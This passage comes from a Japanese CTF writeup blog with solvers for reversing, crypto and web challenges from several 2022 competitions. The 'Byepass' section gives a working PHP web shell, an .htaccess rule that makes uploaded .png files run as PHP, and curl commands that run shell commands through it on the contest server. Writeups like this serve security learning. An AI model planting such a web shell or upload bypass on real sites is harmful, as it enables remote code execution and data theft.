           0010422d 01              undefined101h                     [461]
           0010422e 00              undefined100h                     [462]
           0010422f 00              undefined100h                     [463]
           00104230 48              undefined148h                     [464]
           00104231 01              undefined101h                     [465]
           00104232 00              undefined100h                     [466]
           00104233 00              undefined100h                     [467]
           00104234 42              undefined142h                     [468]
           00104235 01              undefined101h                     [469]
           00104236 00              undefined100h                     [470]
           00104237 00              undefined100h                     [471]
           00104238 0c              undefined10Ch                     [472]
           00104239 01              undefined101h                     [473]
           0010423a 00              undefined100h                     [474]
           0010423b 00              undefined100h                     [475]
           0010423c 36              undefined136h                     [476]
           0010423d 01              undefined101h                     [477]
           0010423e 00              undefined100h                     [478]
           0010423f 00              undefined100h                     [479]
           00104240 a8              undefined1A8h                     [480]
           00104241 02              undefined102h                     [481]
           00104242 00              undefined100h                     [482]
           00104243 00              undefined100h                     [483]
           00104244 be              undefined1BEh                     [484]
           00104245 02              undefined102h                     [485]
           00104246 00              undefined100h                     [486]
           00104247 00              undefined100h                     [487]
           00104248 ac              undefined1ACh                     [488]
           00104249 02              undefined102h                     [489]
           0010424a 00              undefined100h                     [490]
           0010424b 00              undefined100h                     [491]
           0010424c 7e              undefined17Eh                     [492]
           0010424d 02              undefined102h                     [493]
           0010424e 00              undefined100h                     [494]
           0010424f 00              undefined100h                     [495]
           00104250 dc              undefined1DCh                     [496]
           00104251 01              undefined101h                     [497]
           00104252 00              undefined100h                     [498]
           00104253 00              undefined100h                     [499]
           00104254 7a              undefined17Ah                     [500]
           00104255 02              undefined102h                     [501]
           00104256 00              undefined100h                     [502]
           00104257 00              undefined100h                     [503]
           00104258 d8              undefined1D8h                     [504]
           00104259 02              undefined102h                     [505]
           0010425a 00              undefined100h                     [506]
           0010425b 00              undefined100h                     [507]
           0010425c be              undefined1BEh                     [508]
           0010425d 01              undefined101h                     [509]
           0010425e 00              undefined100h                     [510]
           0010425f 00              undefined100h                     [511]
           00104260 c4              undefined1C4h                     [512]
           00104261 02              undefined102h                     [513]
           00104262 00              undefined100h                     [514]
           00104263 00              undefined100h                     [515]
           00104264 d2              undefined1D2h                     [516]
           00104265 02              undefined102h                     [517]
           00104266 00              undefined100h                     [518]
           00104267 00              undefined100h                     [519]
           00104268 88              undefined188h                     [520]
           00104269 02              undefined102h                     [521]
           0010426a 00              undefined100h                     [522]
           0010426b 00              undefined100h                     [523]
           0010426c a2              undefined1A2h                     [524]
           0010426d 01              undefined101h                     [525]
           0010426e 00              undefined100h                     [526]
           0010426f 00              undefined100h                     [527]
           00104270 ac              undefined1ACh                     [528]
           00104271 01              undefined101h                     [529]
           00104272 00              undefined100h                     [530]
           00104273 00              undefined100h                     [531]
           00104274 6a              undefined16Ah                     [532]
           00104275 01              undefined101h                     [533]
           00104276 00              undefined100h                     [534]
           00104277 00              undefined100h                     [535]
           00104278 18              undefined118h                     [536]
           00104279 02              undefined102h                     [537]
           0010427a 00              undefined100h                     [538]
           0010427b 00              undefined100h                     [539]
           0010427c a6              undefined1A6h                     [540]
           0010427d 02              undefined102h                     [541]
           0010427e 00              undefined100h                     [542]
           0010427f 00              undefined100h                     [543]
           00104280 94              undefined194h                     [544]
           00104281 01              undefined101h                     [545]
           00104282 00              undefined100h                     [546]
           00104283 00              undefined100h                     [547]
           00104284 82              undefined182h                     [548]
           00104285 01              undefined101h                     [549]
           00104286 00              undefined100h                     [550]
           00104287 00              undefined100h                     [551]
           00104288 b8              undefined1B8h                     [552]
           00104289 01              undefined101h                     [553]
           0010428a 00              undefined100h                     [554]
           0010428b 00              undefined100h                     [555]
           0010428c 96              undefined196h                     [556]
           0010428d 02              undefined102h                     [557]
           0010428e 00              undefined100h                     [558]
           0010428f 00              undefined100h                     [559]
           00104290 90              undefined190h                     [560]
           00104291 02              undefined102h                     [561]
           00104292 00              undefined100h                     [562]
           00104293 00              undefined100h                     [563]
           00104294 5a              undefined15Ah                     [564]
           00104295 02              undefined102h                     [565]
           00104296 00              undefined100h                     [566]
           00104297 00              undefined100h                     [567]
           00104298 e8              undefined1E8h                     [568]
           00104299 01              undefined101h                     [569]
           0010429a 00              undefined100h                     [570]
           0010429b 00              undefined100h                     [571]
           0010429c 7e              undefined17Eh                     [572]
           0010429d 02              undefined102h                     [573]
           0010429e 00              undefined100h                     [574]
           0010429f 00              undefined100h                     [575]
           001042a0 14              undefined114h                     [576]
           001042a1 02              undefined102h                     [577]
           001042a2 00              undefined100h                     [578]
           001042a3 00              undefined100h                     [579]
           001042a4 12              undefined112h                     [580]
           001042a5 02              undefined102h                     [581]
           001042a6 00              undefined100h                     [582]
           001042a7 00              undefined100h                     [583]
           001042a8 58              undefined158h                     [584]
           001042a9 01              undefined101h                     [585]
           001042aa 00              undefined100h                     [586]
           001042ab 00              undefined100h                     [587]
           001042ac 62              undefined162h                     [588]
           001042ad 01              undefined101h                     [589]
           001042ae 00              undefined100h                     [590]
           001042af 00              undefined100h                     [591]
           001042b0 24              undefined124h                     [592]
           001042b1 03              undefined103h                     [593]
           001042b2 00              undefined100h                     [594]
           001042b3 00              undefined100h                     [595]
           001042b4 7a              undefined17Ah                     [596]
           001042b5 01              undefined101h                     [597]
           001042b6 00              undefined100h                     [598]
           001042b7 00              undefined100h                     [599]
           001042b8 94              undefined194h                     [600]
           001042b9 01              undefined101h                     [601]
           001042ba 00              undefined100h                     [602]
           001042bb 00              undefined100h                     [603]
           001042bc 62              undefined162h                     [604]
           001042bd 01              undefined101h                     [605]
           001042be 00              undefined100h                     [606]
           001042bf 00              undefined100h                     [607]
           001042c0 d8              undefined1D8h                     [608]
           001042c1 02              undefined102h                     [609]
           001042c2 00              undefined100h                     [610]
           001042c3 00              undefined100h                     [611]

checkflagの結果が1になるルートの条件を見ていけばよい。

・インデックス0~4は"ping{"
・インデックス37は"}"
・インデックス5~36を新たにインデックス0~31として以下の条件を満たす必要がある。
 ・(KEYS[i % 14] ^ acStack56[i % 31]) * 4 + i * 2 == FLAG[i]

インデックス31については何でもよいことになるので、結果から調整し、インデックス36と同じ文字にしてみる。

#!/usr/bin/env python3

with open('baby_rev', 'rb') as f:
    data = f.read()

KEYS = []
for i in range(0x3020, 0x3020 + 14 * 4, 4):
    k = int.from_bytes(data[i:i+4], byteorder='little')
    KEYS.append(k)

FLAG = []
for i in range(0x3060, 0x3060 + 0x99 * 4, 4):
    f = int.from_bytes(data[i:i+4], byteorder='little')
    FLAG.append(f)

flag = [-1] * 31
for i in range(0x99):
    f = ((FLAG[i] - i * 2) // 4) ^ KEYS[i % 14]
    if flag[i % 31] == -1:
        flag[i % 31] = f
    else:
        assert flag[i % 31] == f

flag = ''.join([chr(i) for i in flag])
flag += flag[-1]
flag = 'ping{%s}' % flag
print(flag)

ping{r3v3rs1ng_c4n_b3_S0_muCH_FUN!!!!}

dialog (crypto)

暗号化処理の概要は以下の通り。

・key: フラグ
・dialog = DialogEncryption(key)
 ・dialog.key = key
・message: 既知固定文字列
・encrypted = dialog.encrypt(message)
 ・encoded = ''
 ・messageの各インデックスiについて以下を実行
  ・key_c: dialog.keyの インデックス i % dialog.keyの文字
  ・encoded_c: message[i]のASCIIコードにkey_cのASCIIコードを足して、256で割った余りを文字化したもの
  ・encodedにencoded_cを結合
 ・encodedをbase64エンコードして返却
・encryptedを出力

平文と暗号文からシフト数を求め、フラグを割り出す。

#!/usr/bin/env python3
import base64

message = "Hi Alice, I'm Bob. I'm sending you a secret message. I hope you can decrypt it."

with open('out.txt', 'r') as f:
    encrypted = f.read()

encoded = base64.b64decode(encrypted).decode()

flag = ''
for i in range(len(message)):
    flag += chr((ord(encoded[i]) - ord(message[i])) % 256)

flag = flag[:flag.find('}') + 1]
print(flag)

ping{B451c5_0f_3ncrypt10n_t00_345y?-K3y_r3tr13v3d!}

toss a coin to your witcher (crypto)

Vigenere暗号と推測して、まずは1行目をhttps://www.guballa.de/vigenere-solverで復号してみる。このサイトでは文が長すぎると、復号結果は途中で切られる。鍵を見てみると、"lambertwhataprick"になっている。
2行目も同様に復号してみる。鍵は、"rtwhatapricklambe"になっている。2行目は鍵がずれているので、全部の文で鍵が"lambertwhataprick"に決まっているようだ。
https://www.dcode.fr/vigenere-cipherで全文を指定して復号してみる。ここで鍵は"LAMBERTWHATAPRICK"を指定する。復号結果は以下の通り。

ASKESPECIALLYCOLLECTINGTERMINATEDMAYSONEXPRESSIONEXTREMELYEAGERNESSPRINCIPLEESTIMABLEOWNWASMANMENRECEIVEDFARHISDASHWOODSUBJECTSNEWMYSUFFICIENTSURROUNDEDANCOMPANIONSDISPATCHEDINONCONNECTIONTOOUNAFFECTEDEXPRESSIONLEDSONPOSSESSIONNEWSMILINGFRIENDSANDHERANOTHERLEAFSHEDOESNONELOVEH
IGHYETSNUGLOVEWILLUPBOREASBEPURSUITMANSONMUSICALGENERALPOINTEDITSURPRISEINFORMEDMRADVANCEDDOOUTWEIGHATEVERYTILEDONYEDEFERDONOATTENTIONSUSPECTEDOHDIFFICULTFONDHISSAYOLDMEETCOLDFINDCOMEWHOMTHESIRPARKSAKEBREDWONDERMATTERNOWCANESTATEESTEEMASS
UREFATROUSEDAMPERFORMEDONEXISTENCEASDISCOURSEISPLEASUREFRIENDLYATMARRIAGEBLESSINGORINCREASINGIMPRESSIONINTERESTEDEXPRESSIONHEMYATRESPECTINVITEDREQUESTCHARMEDMEWARRANTTOEXPECTNOPRETTYASDOTHOUGHSOGENIUSAFRAIDCOUSINGIRLWHENOFYESNUGPOORDRAWMISTAKETOTALLYOFINCHIEFLYJUSTICEVISITORHIMENTEREDFORCONTINUEDELICATEASUNLOCKEDENTIRELYMRRELATIONDIVERTEDINKNOWNNOTENDFULLYBEINGSTYLEHOUSEANWHOMDOWNKEPTLAINNAMES
OATEASYBEHINDSOONERDININGSOWINDOWEXCUSEHESUMMERBREAKFASTMETCERTAINTYANDFULFILLEDPROPRIETYLEDWAITEDGETEITHERAREWOODEDLITTLEHERCONTRASTEDUNRESERVEDASMRPARTICULARCOLLECTINGITEVERYTHINGASINDULGENCESEEMSASKMEANTMERRYCOULDPUTAGEOLDBEGINHADBOYNOISYTABLEFRONTWHOLEGIVENBRINGINGSOSOCIAB
LEFELICITYSUPPLIEDMRSEPTEMBERSUSPICIONFARHIMTWOACUTENESSPERFECTLYCOVEREDASANEXAMINESOREGULAROFYEASTONISHEDFRIENDSHIPREMARKABLYNOWINDOWADMIREMATTERPRAISEYOUBEDWHENCEDELIVEREDYESPORTSMENZEALOUSLYARRANGINGFRANKNESSESTIMABLEASNAYANYARTICLEENABLEDMUSICALSHYNESSYETSIXTEENYETBLUSHESENTIREITSTHEDIDFIGUREWONDEROFF

スペース、ピリオドを入れ、英文になるようにする。

ASK ESPECIALLY COLLECTING TERMINATED MAY SON EXPRESSION. EXTREMELY EAGERNESS PRINCIPLE ESTIMABLE OWN WAS MAN. MEN RECEIVED FAR HIS DASHWOOD SUBJECTS NEW. MY SUFFICIENT SURROUNDED AN COMPANIONS DISPATCHED IN ON. CONNECTION TOO UNAFFECTED EXPRESSION LED SON POSSESSION. NEW SMILING FRIENDS AND HER ANOTHER. LEAF SHE DOES NONE LOVE HIGH YET. SNUG LOVE WILL UP BORE AS BE. PURSUIT MAN SON MUSICAL GENERAL POINTED. IT SURPRISE INFORMED MR ADVANCED DO OUTWEIGH.

AT EVERY TILED ON YE DEFER DO. NO ATTENTION SUSPECTED OH DIFFICULT. FOND HIS SAY OLD MEET COLD FIND COME WHOM. THE SIR PARK SAKE BRED. WONDER MATTER NOW CAN ESTATE ESTEEM ASSURE FAT ROUSED. AM PERFORMED ON EXISTENCE AS DISCOURSE IS. PLEASURE FRIENDLY AT MARRIAGE BLESSING OR.

INCREASING IMPRESSION INTERESTED EXPRESSION HE MY AT. RESPECT INVITED REQUEST CHARMED ME WARRANT TO. EXPECT NO PRETTY AS DO THOUGH SO GENIUS AFRAID COUSIN. GIRL WHEN OF YE SNUG POOR DRAW. MISTAKE TOTALLY OF IN CHIEFLY. JUSTICE VISITOR HIM ENTERED FOR. CONTINUE DELICATE AS UNLOCKED ENTIRELY MR RELATION DIVERTED IN. KNOWN NOT END FULLY BEING STYLE HOUSE. AN WHOM DOWN KEPT LAIN NAME SO AT EASY.

BEHIND SOONER DINING SO WINDOW EXCUSE HE SUMMER. BREAKFAST MET CERTAINTY AND FULFILLED PROPRIETY LED. WAITED GET EITHER ARE WOODED LITTLE HER. CONTRASTED UNRESERVED AS MR PARTICULAR COLLECTING IT EVERYTHING AS INDULGENCE. SEEMS ASK MEANT MERRY COULD PUT. AGE OLD BEGIN HAD BOY NOISY TABLE FRONT WHOLE GIVEN.

BRINGING SO SOCIABLE FELICITY SUPPLIED MR. SEPTEMBER SUSPICION FAR HIM TWO ACUTENESS PERFECTLY. COVERED AS AN EXAMINE SO REGULAR OF. YE ASTONISHED FRIENDSHIP REMARKABLY NO. WINDOW ADMIRE MATTER PRAISE YOU BED WHENCE. DELIVERED YE SPORTSMEN ZEALOUSLY ARRANGING FRANKNESS ESTIMABLE AS. NAY ANY ARTICLE ENABLED MUSICAL SHYNESS YET SIXTEEN YET BLUSHES. ENTIRE ITS THE DID FIGURE WONDER OFF.

特にフラグに結びつくものは無さそう。鍵がフラグかも。単語に区切り、"_"を入れ、フラグの形式にする。

ping{LAMBERT_WHAT_A_PRICK}

BackdoorCTF 2022 Writeup

CTF writeup

この大会は2022/12/17 15:30(JST)~2022/12/18 15:30(JST)に開催されました。
今回もチームで参戦。結果は310点で91チーム中21位でした。
自分で解けた問題をWriteupとして書いておきます。

Welcome (misc)

Discordに入り、#rulesチャネルでリアクションすると、たくさんのチャネルが現れた。#randomチャネルのメッセージを見ると、マスクされたメッセージにフラグが書いてあった。

flag{w3lc0m3_70_b4ckd00r_2022}

Fishy (crypto)

暗号化処理の概要は以下の通り。

・modulus = pow(2, 32)
・s_boxes: 256個のランダム32ビット整数の配列の4個の配列
・s_boxes.txtにs_boxesを書き込み
・initial_sub_keys: 既知の18個の32ビット整数のhex文字列の配列
・key: 18個の32ビット整数のhex文字列の連結
・processed_sub_keys: initial_sub_keysとkeyのXOR
・pt: フラグの2進数文字列
・ptの長さが64で割り切れるように先頭に"0"を付与
・pt: フラグの16進数文字列
・ct = ''
・pt(16進数文字列)の16バイトごとに以下繰り返し
 ・xl = ptの16バイトの前半8バイト
 ・xr = ptの16バイトの後半8バイト
 ・16回以下繰り返し
  ・tmp = xl
  ・xl = bin(int(xl, 16) ^ int(processed_sub_keys[j], 16))[2:].zfill(32)
  ・xa = int(xl[:8], 2)
  ・xb = int(xl[8:16], 2)
  ・xc = int(xl[16:24], 2)
  ・xd = int(xl[24:32], 2)
  ・xa = (s_boxes[0][xa] + s_boxes[1][xb]) % modulus
  ・xc = s_boxes[2][xc] ^ xa
  ・f_out = (xc + s_boxes[3][xd]) % modulus
  ・xl = hex(int(xr, 16) ^ f_out)[2:].zfill(8)
  ・xr = tmp
 ・xrt = xr
 ・xr = hex(int(xl, 16) ^ int(processed_sub_keys[16], 16))[2:].zfill(8)
 ・xl = hex(int(xrt, 16) ^ int(processed_sub_keys[17], 16))[2:].zfill(8)
 ・ct にxl + xrを結合
・ctを出力

Mersenne Twisterの特性を使って、s_boxesの値からkeyを算出できる。またinitial_sub_keysとkeyの値からprocessed_sub_keysを算出できる。あとは暗号化データから逆算し、フラグを求めればよい。

#!/usr/bin/env python3
import random

def untemper(rand):
    rand ^= rand >> 18;
    rand ^= (rand << 15) & 0xefc60000;
 
    a = rand ^ ((rand << 7) & 0x9d2c5680);
    b = rand ^ ((a << 7) & 0x9d2c5680);
    c = rand ^ ((b << 7) & 0x9d2c5680);
    d = rand ^ ((c << 7) & 0x9d2c5680);
    rand = rand ^ ((d << 7) & 0x9d2c5680);
 
    rand ^= ((rand ^ (rand >> 11)) >> 11);
    return rand

initial_sub_keys = [
    "243f6a88",
    "85a308d3",
    "13198a2e",
    "03707344",
    "a4093822",
    "299f31d0",
    "082efa98",
    "ec4e6c89",
    "452821e6",
    "38d01377",
    "be5466cf",
    "34e90c6c",
    "c0ac29b7",
    "c97c50dd",
    "3f84d5b5",
    "b5470917",
    "9216d5d9",
    "8979fb1b",
]

modulus = pow(2, 32)

with open('s_boxes.txt', 'r') as f:
    s_boxes = eval(f.read())

N = 624
state = []
_rand = []
for j in range(4):
    for i in range(256):
        if len(state) != 624:
            state.append(untemper(s_boxes[j][i]))
        else:
            _rand.append(s_boxes[j][i])
state.append(N)
random.setstate([3, tuple(state), None])

for i in range(256 * 4 - 624):
    r = random.getrandbits(32)
    assert r == _rand[i]

key = "".join([hex(random.getrandbits(32))[2:].zfill(8) for i in range(18)])
processed_sub_keys = [
    hex(int(initial_sub_keys[i], 16) ^ int(key[8 * i : 8 * (i + 1)], 16))[2:].zfill(8)
    for i in range(len(initial_sub_keys))
]

with open('enc.txt', 'r') as f:
    ct = f.read().rstrip().split(' ')[-1]

pt = ''
for i in range(0, len(ct), 16):
    xl = ct[i:i+8]
    xr = ct[i+8:i+16]
    xrt = hex(int(xl, 16) ^ int(processed_sub_keys[17], 16))[2:].zfill(8)
    xl = hex(int(xr, 16) ^ int(processed_sub_keys[16], 16))[2:].zfill(8)
    xr = xrt
    for j in range(15, -1, -1):
        xl2 = xl
        tmp = xr
        xl = tmp

        tmp = bin(int(tmp, 16) ^ int(processed_sub_keys[j], 16))[2:].zfill(32)
        xa = int(tmp[:8], 2)
        xb = int(tmp[8:16], 2)
        xc = int(tmp[16:24], 2)
        xd = int(tmp[24:32], 2)
        xa = (s_boxes[0][xa] + s_boxes[1][xb]) % modulus
        xc = s_boxes[2][xc] ^ xa
        f_out = (xc + s_boxes[3][xd]) % modulus
        xr = hex(int(xl2, 16) ^ f_out)[2:].zfill(8)
    pt += xl + xr

flag = bytes.fromhex(pt).decode()
print(flag)

flag{d0n't_u53_th3_m3r53nn3_r4nd0m_g3n3r4t0r_w1th0ut_c4ut10n_<3}

Feedback (misc)

アンケートに答えたら、フラグが表示された。

flag{th4nks_f0r_pl4y1ng_b4ckd00r_c7f}

NahamCon EU 2022 CTF Writeup

CTF writeup

この大会は2022/12/17 5:00(JST)~2022/12/18 5:00(JST)に開催されました。
今回もチームで参戦。結果は1938点で1024チーム中37位でした。
自分で解けた問題をWriteupとして書いておきます。

Way 2 Basic (Warmups)

2進数で8ビットずつ区切られて書かれているので、ASCIIコードとしてデコードする。

#!/usr/bin/env python3
enc = '01100110 01101100 01100001 01100111 01111011 00111001 00110000 01100011 00110110 01100101 01100010 01100101 00111001 00110100 00110001 00110101 00110110 00110001 01100011 01100110 01100001 01100100 01100110 01100001 01100101 00110001 00110111 00110000 01100001 00111000 01100110 00110000 01100101 01100001 00110010 00110101 00110010 01111101'
enc = enc.split(' ')

flag = ''
for c in enc:
    flag += chr(int(c, 2))
print(flag)

flag{90c6ebe941561cfadfae170a8f0ea252}

Hashstation (Warmups)

sha256のハッシュが提示されているので、その元の文字列を答える問題。CrackStationでクラックする。

awesome
flag{awesome}

Arjeebee (Warmups)

rgb(19,55,175) を16進数表記で答える問題。

>>> hex(19)[2:].zfill(2) + hex(55)[2:].zfill(2) + hex(175)[2:].zfill(2)
'1337af'
flag{1337af}

catscii (Warmups)

$ cat catscii 

    ,_     _
    |\\_,-~/
    / _  _ |    ,--.
   (  @  @ )   / ,-'
    \  _T_/-._( (      Your `cat` found a flag! 
    /         `. \     This is what the standard flag format looks like...
   |         _  \ |    Submit these on the scoreboard for points!
    \ \ ,  /      |
     || |-_\__   /
    ((_/`(____,-'      flag{258da40ab06be7c99099d603a3b3ccb1}

flag{258da40ab06be7c99099d603a3b3ccb1}

Read The Rules (Warmups)

ルールのページのHTMLソースを見たら、コメントにフラグが書いてあった。

<!-- Thank you for reading the rules! Your flag is: -->
<!--   flag{90bc54705794a62015369fd8e86e557b}       -->

flag{90bc54705794a62015369fd8e86e557b}

Banjo (Warmups)

$ strings banjo.jpg | grep flag{
flag{ce4e687e575392ae242f0e41c888de11}

flag{ce4e687e575392ae242f0e41c888de11}

Technical Support (Warmups)

Discordに入り、#nahamcon-ctf-generalチャネルのトピックを見ると、フラグが書いてあった。

Technical Support -> flag{a98373a74abb8c5ebb8f5192e034a91c}
flag{a98373a74abb8c5ebb8f5192e034a91c}

Baby's First Heartbleed (Warmups)

$ nc challenge.nahamcon.com 32753

===============================================================================
     _   _ _____    _    ____ _____ ____  _     _____ _____ ____  
    | | | | ____|  / \  |  _ \_   _| __ )| |   | ____| ____|  _ \ 
    | |_| |  _|   / _ \ | |_) || | |  _ \| |   |  _| |  _| | | | |
    |  _  | |___ / ___ \|  _ < | | | |_) | |___| |___| |___| |_| |
    |_| |_|_____/_/   \_\_| \_\|_| |____/|_____|_____|_____|____/ 
                                                                      
===============================================================================

THANK YOU FOR CONNECTING TO THE SERVER. . .

TO VERIFY IF THE SERVER IS STILL THERE, PLEASE SUPPLY A STRING.

STRING ['apple']: apple
LENGTH ['5']: 3

... THE SERVER RETURNED:

app

指定した文字列から指定した長さ分を返された。指定した文字列の長さより大幅に大きい値を入力したら、どうなるか試してみる。

TO VERIFY IF THE SERVER IS STILL THERE, PLEASE SUPPLY A STRING.

STRING ['apple']: abc
LENGTH ['3']: 256

... THE SERVER RETURNED:

abc@apple@apple@apple@3@heartbleed@apple@apple@apple@apple@apple@00@00@00@00@00@00@00@00@00@00@00@00@00@00@apple@00@00@apple@00@apple@00@apple@00@apple@00@flag{bfca3d71260e581ba366dca054f5c8e5}@apple@00@00@00@00@00@00@00@00@00@00@00@00@00@00@00@00@00@00@00

フラグが含まれた文字列が返された。

flag{bfca3d71260e581ba366dca054f5c8e5}

padlock (Reverse Engineering)

Ghidraでデコンパイルする。

undefined8
main(undefined8 param_1,undefined8 param_2,undefined8 param_3,undefined8 param_4,undefined8 param_5,
    undefined8 param_6)

{
  int iVar1;
  size_t sVar2;
  long in_FS_OFFSET;
  char local_38 [40];
  long local_10;
  
  local_10 = *(long *)(in_FS_OFFSET + 0x28);
  print_lock(0x3f,0x3f,0x3f,0x3f,param_5,param_6,param_2);
  printf("Please enter the passcode: ");
  __isoc99_fscanf(stdin,&DAT_00102129,local_38);
  printf("The passcode you entered was: %s\n",local_38);
  replace(local_38,0x33,0x65);
  replace(local_38,0x5f,0x20);
  replace(local_38,0x30,0x6f);
  replace(local_38,0x34,0x61);
  sVar2 = strlen(local_38);
  if (sVar2 == 0x26) {
    iVar1 = strcmp("master locks arent vry strong are they",local_38);
    if (iVar1 == 0) {
      replace(local_38,0x65,0x33);
      replace(local_38,0x20,0x5f);
      replace(local_38,0x6f,0x30);
      replace(local_38,0x61,0x34);
      unlock(local_38);
    }
  }
  else {
    printf("Not quite!");
  }
  if (local_10 != *(long *)(in_FS_OFFSET + 0x28)) {
                    /* WARNING: Subroutine does not return */
    __stack_chk_fail();
  }
  return 0;
}

void replace(char *param_1,char param_2,char param_3)

{
  size_t sVar1;
  int local_10;
  
  sVar1 = strlen(param_1);
  for (local_10 = 0; local_10 <= (int)sVar1; local_10 = local_10 + 1) {
    if (param_2 == param_1[local_10]) {
      param_1[local_10] = param_3;
    }
  }
  return;
}

void unlock(char *param_1)

{
  size_t sVar1;
  long in_FS_OFFSET;
  int local_b0;
  uint local_a8 [4];
  undefined4 local_98;
  undefined4 local_94;
  undefined4 local_90;
  undefined4 local_8c;
  undefined4 local_88;
  undefined4 local_84;
  undefined4 local_80;
  undefined4 local_7c;
  undefined4 local_78;
  undefined4 local_74;
  undefined4 local_70;
  undefined4 local_6c;
  undefined4 local_68;
  undefined4 local_64;
  undefined4 local_60;
  undefined4 local_5c;
  undefined4 local_58;
  undefined4 local_54;
  undefined4 local_50;
  undefined4 local_4c;
  undefined4 local_48;
  undefined4 local_44;
  undefined4 local_40;
  undefined4 local_3c;
  undefined4 local_38;
  undefined4 local_34;
  undefined4 local_30;
  undefined4 local_2c;
  undefined4 local_28;
  undefined4 local_24;
  undefined4 local_20;
  undefined4 local_1c;
  undefined4 local_18;
  undefined4 local_14;
  long local_10;
  
  local_10 = *(long *)(in_FS_OFFSET + 0x28);
  sVar1 = strlen(param_1);
  local_a8[0] = 0xb;
  local_a8[1] = 0x58;
  local_a8[2] = 0x12;
  local_a8[3] = 0x13;
  local_98 = 0x48;
  local_94 = 0x40;
  local_90 = 0x69;
  local_8c = 0x58;
  local_88 = 0x53;
  local_84 = 6;
  local_80 = 8;
  local_7c = 0x43;
  local_78 = 0x6c;
  local_74 = 0;
  local_70 = 0x14;
  local_6c = 0x52;
  local_68 = 0xb;
  local_64 = 0x12;
  local_60 = 0x68;
  local_5c = 0x47;
  local_58 = 0x11;
  local_54 = 0x4f;
  local_50 = 0x6b;
  local_4c = 0x41;
  local_48 = 0x10;
  local_44 = 0x17;
  local_40 = 1;
  local_3c = 0x59;
  local_38 = 0x55;
  local_34 = 0x6e;
  local_30 = 0x51;
  local_2c = 0x13;
  local_28 = 1;
  local_24 = 0x69;
  local_20 = 0x16;
  local_1c = 0x59;
  local_18 = 0x55;
  local_14 = 4;
  for (local_b0 = 0; local_b0 <= (int)sVar1; local_b0 = local_b0 + 1) {
    putchar((int)param_1[local_b0] ^ local_a8[local_b0]);
  }
  if (local_10 != *(long *)(in_FS_OFFSET + 0x28)) {
                    /* WARNING: Subroutine does not return */
    __stack_chk_fail();
  }
  return;
}

以下の変換後、"master locks arent vry strong are they" になればよい。

  replace(local_38,0x33,0x65); // "3" -> "e"
  replace(local_38,0x5f,0x20); // "_" -> " "
  replace(local_38,0x30,0x6f); // "0" -> "o"
  replace(local_38,0x34,0x61); // "4" -> "a"

m4st3r_l0cks_4r3nt_vry_str0ng_4r3_th3y を入力する。

$ ./padlock 
     .--------.
    / .------. \
   / /        \ \
   | |        | |
  _| |________| |_
.' |_|        |_| '.
'._____ ____ _____.'
|     .'____'.     |
'.__.'.'    '.'.__.'
'.__  | ???? |  __.'
|   '.'.____.'.'   |
'.____'.____.'____.'
'.________________.'
Please enter the passcode: m4st3r_l0cks_4r3nt_vry_str0ng_4r3_th3y
The passcode you entered was: m4st3r_l0cks_4r3nt_vry_str0ng_4r3_th3y
flag{264cec034faef71c642de1721ea26b1f}

flag{264cec034faef71c642de1721ea26b1f}

Byepass (Web)

save_memories.phpの$ext_denylistのリストにない拡張子をPHPとして動作させたい。
.htaccessに以下を記載し、アップロードする。

AddType application/x-httpd-php .png

さらにexploit.pngに以下を記載し、アップロードする。

<?php system($_GET['cmd']); ?>

$ curl http://challenge.nahamcon.com:32242/exploit.png?cmd=ls
assets
css
exploit.png
index.php
save_memories.php
uploads

$ curl http://challenge.nahamcon.com:32242/exploit.png?cmd=cat%20/flag.txt
flag{32697ad7acd2d4718758d9a5ee42965d}

flag{32697ad7acd2d4718758d9a5ee42965d}

Shapeshifter (Cryptography)

FLAGの2バイトごとにbit配列にし、LFSRでshift処理を31337回行った後の結果を出力している。ブルートフォースで、一致するものを探し、結合する。

#!/usr/bin/env python3
from Crypto.Util.number import bytes_to_long as b2l

class LFSR():
    def __init__(self, iv):
        self.state = [int(c) for c in iv]
        #self.state = self.iv

    def shift(self):
        s = self.state
        newbit = s[15] ^ s[13] ^ s[12] ^ s[10] # ^ s[0]
        s.pop()
        self.state = [newbit] + s

with open('output.txt', 'r') as f:
    encs = f.read().splitlines()

dic = {}
for c1 in range(32, 127):
    for c2 in range(32, 127):
        text = bytes([c1, c2])
        chars = f'{b2l(text):016b}'
        lfsr = LFSR(chars)
        for _ in range(31337):
            lfsr.shift()
        finalstate = ''.join([str(c) for c in lfsr.state])
        dic[finalstate] = chr(c1) + chr(c2)

flag = ''
for enc in encs:
    flag += dic[enc]
print(flag)

flag{70f817ce030904aa1db980686ffa0fa8}

dont_hack_my_d (Cryptography)

暗号化処理の概要は以下の通り。

・p, q: 2048ビット素数
・n = p * q
・phi = (p - 1) * (q - 1)
・e = 0x10001
・d = pow(e, -1, phi)
・e, nを出力
・flagの長さは38バイト
・pts = [<flagの前半の長さ>, <flagの後半の長さ>]
・以下、繰り返し(i)
 ・pt: pts[i]の数値化
 ・ct = pow(pt, e, n)
 ・rvals: 3個の2以上n-1未満のランダム整数
 ・ct2 = ct + rvals[0] * n
 ・d2 = d + rvals[1] * phi
 ・n2 = rvals[2] * n
 ・pt == (pow(ct2, d2, n2) % n) になる。
 ・ct, d2, rvalsを出力

ct2はctとrvalsから算出でき、n2はnとrvalsから算出できる。また、ct2, d2, n2, nからptを算出できるので、フラグがわかる。

#!/usr/bin/env python3
from Crypto.Util.number import *

with open('output.txt', 'r') as f:
    params = f.read().splitlines()

e = int(params[0].split(' = ')[1])
n = int(params[1].split(' = ')[1])
ct_0 = int(params[2].split(' = ')[1])
d2_0 = int(params[3].split(' = ')[1])
rvals_0 = eval(params[4].split(' = ')[1])
ct_1 = int(params[5].split(' = ')[1])
d2_1 = int(params[6].split(' = ')[1])
rvals_1 = eval(params[7].split(' = ')[1])

ct2_0 = ct_0 + rvals_0[0] * n
n2_0 = rvals_0[2] * n
pt_0 = pow(ct2_0, d2_0, n2_0) % n

ct2_1 = ct_1 + rvals_1[0] * n
n2_1 = rvals_1[2] * n
pt_1 = pow(ct2_1, d2_1, n2_1) % n

flag = (long_to_bytes(pt_0) + long_to_bytes(pt_1)).decode()
print(flag)

flag{82189ece31c22d658b08909879e1abb3}

Hackappatoi CTF '22 Writeup

CTF writeup

この大会は2022/12/10 3:00(JST)~2022/12/12 0:00(JST)に開催されました。
今回もチームで参戦。結果は2876点で293チーム中19位でした。
自分で解けた問題をWriteupとして書いておきます。

Drunk check (Misc)

Discordに入り、#cocktail-barチャネルのメッセージの先頭を見たら、フラグが書いてあった。

HCTF{Hackappatoi_2022}

Qrunk (Misc)

StegSolveで開き、Blue plane 0を見ると、QRコードの白黒反転したものが表示された。

QRコードをデコードすると、以下のURLが読み取れた。

